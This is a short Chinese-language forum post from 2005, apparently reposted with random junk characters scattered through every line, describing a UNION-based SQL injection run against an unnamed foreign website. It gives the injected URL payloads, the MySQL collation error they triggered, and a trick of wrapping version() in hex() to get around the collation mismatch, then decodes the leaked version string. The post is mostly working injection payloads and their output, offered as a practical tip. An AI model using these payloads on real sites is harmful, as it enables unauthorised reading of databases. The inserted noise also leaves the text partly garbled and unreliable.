本文作者:SuperHei
5 ~, A, z. y, T+ T4 r文章性质:原创6 b, P* f/ |% t- V5 ?
发布日期:2005-10-18# w' z4 R" z7 W* d
测试个国外的站时:7 N& \% R. b( ]* X0 H8 j
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*, i% U6 V( N, Y+ J
返回错误:* Q- v/ l3 g+ D9 o' l9 _' h
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
! W2 f+ G" Q& Z( Q" I! Q6 E+ z7 \MySQL Error No. 126
/ C0 [/ A6 q# x. ^' y U, C, z. e看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
- r4 J n' N' e' L/ X解决办法:转为其他编码如hex。
- ]2 Q; J( g. burl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*7 ]( \+ n g; _( c
成功得到hex(version())的值为:7 r, E' X I6 a0 ~( ^
342E312E332D62657461
- X( x1 @ |" V4 }回Mysql查询下得到:/ \% t0 M& S5 ]: |, C( E
mysql> select 0x342E312E332D62657461;# n! `4 W: C1 W
+------------------------+
3 u; M! e, ~* L* b6 q9 r| 0x342E312E332D62657461 |
3 U/ V0 @) T# K+------------------------+# v9 L4 Y+ @* z: G1 W {- w
| 4.1.3-beta |
/ G: |# Z5 K5 g4 D; D8 t+------------------------+* s* A4 G. Y2 w- P* ^8 q3 I8 |
1 row in set (0.00 sec)9 ?& g9 t$ K0 L
# ^( ]6 {! ^" V) m
|